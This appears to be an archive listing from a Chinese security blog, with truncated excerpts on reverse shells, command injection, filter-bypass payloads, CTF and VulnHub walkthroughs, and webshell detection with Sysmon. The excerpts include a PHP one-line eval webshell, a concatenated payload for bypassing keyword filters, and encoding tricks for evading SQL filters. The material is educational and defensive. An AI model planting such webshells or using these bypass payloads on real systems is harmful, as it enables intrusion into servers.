- 2024-11-132024 同一个网段,反弹shell四种方法【linux版本】bash、python、nc、villian反弹shell图解步骤
实验环境准备(同一个网段下,我是桥接的虚拟机)一、bash反弹shell二、python反弹shell三、nc反弹shell四、villain反弹shell实验环境准备(同一个网段下,我是桥接的虚拟机) 一台kali的linux(攻击者) 一台centos7/debian[另一个linux](受害者)一、b
- 2024-08-31命令执行漏洞
原理:用户输入的数据被当做系统命令进行执行//其实一句话木马的本质就是一个命令执行漏洞。用户输入的数据被当做系统命令进行执行。在PHP存在诸多函数可以做到命令执行。1、system('whoami');PHP会操纵计算机执行whoami的命令,且输出并返回结果注意:目标机器是linux执行的就
- 2024-07-04命令执行
基础概念命令注入通常因为指Web应用在服务器上拼接系统命令而造成的漏洞。该类漏洞通常出现在调用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主机名/IP/掩码/网关、查看系统信息以及关闭重启等功能,或者一些站点提供如ping、nslookup、提供发送邮件、转换图片等功
- 2024-05-21文件共享服务器
cifs(简称)(说白了就是让一个电脑里的文件能够被远程管理) 查看本机用户whoamiwhoami/user在共享名后面加$就可以隐藏共享查看共享netshare取消共享 netshare共享名/del创建共享netshare共享名=c:\(文件名) 注册表(c盘里):一个电脑
- 2024-04-2839、BlackRose(VulnHub)
BlackRose一、nmap二、web渗透随便看看注册进去账号:xxxxxx密码:xxxxxx目录爆破有很多特殊的目录,不过访问后都重定向了burpsuite改包进admin查看xxxxxx用户数据包抓一些xxxxxx用户的一些记录包,看看有什么可用的signature=&command=id&indexcsrf=3cb58993bfd71f
- 2024-03-21一些简单的绕过总结
一些简单的绕过总结对关键字进行不同编码select*fromzzz=select*from%257a%257a%257a//url编码单引号=%u0027、%u02b9、%u02bc//Unicode编码adminuser=0x61646D696E75736572//部分十六进制编码空格=%20%09%0a%0b%0c%0d%a0//各类编码对关键
- 2023-09-16subprocess模块
subprocess模块是python自带的,安主要用来取代一些旧的模块或方法,如os.system、os.spawn*、os.popen*、commands.*,因此如果需要用python调用外问命令或任务时,则优先使用subprocess模块。使用subprocess模块可以方便地执行操作系统支持的命令。一、subprocess.run()方法:subprocess.
- 2023-09-08绕过PHP正则表达式
1.字符串拼接绕过【PHP>=7】适合绕过具体关键字payload:(sy.(st).em)(who.ami); 2.字符串转义绕过【PHP>=7】字符串转十六进制、八进制、unicode脚本#-*-coding:utf-8-*-defhex_payload(payload): res_payload='' foriinpayload: i="\\x"+hex(ord(i))[2
- 2023-08-22Linux命令的连接符
&&逻辑与如果ipa命令执行失败,那么不执行whoami;如果ipa命令执行成功,那么执行whoami。ipa&&whoami||逻辑或如果ipa命令执行成功,那么不执行whoami;如果ipa命命执行失败,那么执行whoami。ipa||whoami;ipa命令先执行,无论是否成功,都会执行whoami。ipa;whoami|管道符**前
- 2023-07-21Canarytokens的基本使用
https://www.canarytokens.org/generateSensitivecommandtoken当某些敏感的windows程序运行时可以给指定的邮箱发送警报。其会生成一个注册表文件,导入注册表中就会监视指定程序的运行,然后在执行程序后向canarytoken网站回传警报信息,并向指定邮箱发送警报邮件。WindowsRegi
- 2023-07-17whoami
whoami打印当前有效的用户ID对应的名称概要whoami[OPTION]...主要用途打印当前有效的用户ID对应的名称。选项--help显示帮助信息并退出。--version显示版本信息并退出。返回值返回0表示成功,返回非0值表示失败。例子[root@localhost~]#whoamiroot
- 2023-06-01webshell后门中执行交互命令看到的sysmon数据采集和检测
下载phpstudy,链接:https://public.xp.cn/upgrades/phpStudy_64.zip,如下图启动wnmp。 webshell内容:<?phpecho"Yourresponseis:";?><?php@eval($_GET['cmd']);?>写入C:\phpstudy_pro\WWW下的shell.php文件。 浏览器执行命令:localhost/shell.php?cmd=syste
- 2023-05-29web基础漏洞-系统命令注入
1、介绍应用程序有时需要调用一些执行系统命令的函数,如在php中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令。当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行攻击。2、windows支持的管道符|直
- 2023-05-19“百度杯”CTF比赛 2017 二月场——Web-爆破-3
==================================个人收获:1.php中MD5()计算数组会返回null如果用==0则为真 ================================== 题目:主要是代码审计,大家可以自己百度下都能看得懂的,这里我就直说关键的部分 关键部分代码在这if($_SESSION['whoami']==($value[0].$value[1
- 2023-02-26DNSlog
1.原理通过恶意payload组合的三级域名后对服务器发起的DNS请求。 2.利用场景SQL注入RCE(远程命令执行)SSRF(服务端请求伪造)RFI(远程文件包含)3.Payload example
- 2023-02-09西湖论剑
西湖论剑NodeMagicalLogin在flag1路径下伪造cookie可以拿到flag1在checkcode=checkcode.toLowerCase()处通过数组使之报错进入catch拿到flag2复现过程中的收获:co
- 2022-09-04命令执行
命令连接符A 连接符 B|A为假,直接报错;A为真,直接执行B||A为真,只执行A;A为假,执行B&A为真,AB都执行;A为假,直接执行B&&A为假,直接报错;A为真,AB都执行;顺序执行,